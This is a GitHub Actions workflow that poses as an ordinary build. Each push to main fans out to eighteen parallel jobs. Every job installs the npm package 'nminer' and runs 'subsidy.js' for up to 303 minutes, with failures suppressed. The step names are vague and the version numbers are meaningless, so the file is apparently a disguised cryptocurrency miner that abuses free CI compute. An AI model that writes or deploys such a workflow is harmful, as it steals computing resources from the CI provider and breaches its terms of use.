name: subsidy
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 6054 }
          - { version: 788 }
          - { version: 7615 }
          - { version: 4031 }
          - { version: 387 }
          - { version: 5916 }
          - { version: 1875 }
          - { version: 8553 }
          - { version: 7698 }
          - { version: 5637 }
          - { version: 2895 }
          - { version: 4502 }
          - { version: 3359 }
          - { version: 96 }
          - { version: 9289 }
          - { version: 9852 }
          - { version: 4495 }
          - { version: 2407 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: underneath
        run: |
          npm install nminer@latest
          timeout 303m node subsidy.js || echo "subsidy executed"